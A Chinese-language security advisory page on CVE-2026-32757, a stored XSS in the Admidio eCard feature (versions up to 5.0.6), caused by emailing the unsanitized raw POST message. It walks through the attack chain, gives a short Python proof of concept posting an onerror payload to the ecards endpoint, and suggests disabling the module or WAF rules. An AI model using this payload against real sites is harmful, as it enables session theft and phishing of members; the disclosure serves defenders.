IPBUF安全漏洞报告
English
CVE-2026-32757 CVSS 5.4 中危

CVE-2026-32757 Admidio 存储型XSS漏洞

披露日期: 2026-03-20

漏洞信息

漏洞编号
CVE-2026-32757
漏洞类型
存储型跨站脚本攻击 (Stored XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Admidio

相关标签

XSSStored XSSAdmidioInput ValidationPhishingCVE-2026-32757

漏洞概述

Admidio 5.0.6及以下版本存在存储型XSS漏洞。由于eCard发送处理程序在构建邮件HTML时,错误地使用了未经净化的原始POST数据`ecard_message`,攻击者可绕过服务器端的HTMLPurifier过滤机制。低权限认证用户只需发送包含恶意脚本的问候卡,即可将攻击载荷注入到发给其他成员的邮件中,进而实施网络钓鱼或窃取敏感数据。

技术细节

该漏洞源于Admidio在处理eCard发送请求时的代码逻辑错误。虽然系统在表单验证阶段使用了HTMLPurifier对`ecard_message`进行净化,但在后续生成邮件内容时,开发人员直接引用了全局变量`$_POST['ecard_message']`而非净化后的变量。这一差异导致安全过滤失效。攻击者利用此缺陷,可在消息字段中注入任意HTML标签或JavaScript代码。当目标用户打开被污染的邮件时,恶意代码将在其邮箱上下文中执行,从而可能劫持用户会话或诱导用户进行钓鱼操作。

攻击链分析

STEP 1
1. 登录与访问
攻击者使用低权限账户登录Admidio系统,并访问eCard(电子贺卡)发送功能模块。
STEP 2
2. 构造Payload
攻击者在eCard的消息输入框中输入包含恶意JavaScript代码的HTML内容,例如`<script>alert(1)</script>`。
STEP 3
3. 绕过过滤
攻击者发送请求。虽然前端或表单验证层可能进行了过滤,但后端处理逻辑错误地使用了原始$_POST数据,导致恶意代码未被HTMLPurifier净化。
STEP 4
4. 投递载荷
系统生成邮件并发送给目标受害者。邮件内容中包含了攻击者注入的恶意HTML/JS代码。
STEP 5
5. 执行攻击
受害者打开邮件客户端查看邮件。若邮件客户端渲染HTML,恶意脚本即被执行,可能导致Cookie窃取或钓鱼攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-32757 import requests def exploit(target_url, session_cookie): headers = { "Cookie": session_cookie } # Malicious payload to be injected into the email body payload_data = { "ecard_message": "<img src=x onerror=alert('CVE-2026-32757')>", "ecard_recipients": "2", # ID of the victim user # Other required form fields omitted for brevity } # Sending the malicious eCard response = requests.post(f"{target_url}/adm_program/modules/ecards/ecards_function.php", data=payload_data, headers=headers) if response.status_code == 200: print("[+] Payload sent successfully. Check the victim's email.") else: print("[-] Failed to send payload.") # Usage # exploit("http://target-site.com", "PHPSESSID=attacker_session_id")

影响范围

Admidio <= 5.0.6

防御指南

临时缓解措施
在升级前,建议管理员暂时禁用eCard模块以阻断攻击路径。若无法禁用,应在Web应用防火墙(WAF)中部署规则,检测并拦截包含<script>、onerror等可疑特征的ecard_message参数请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表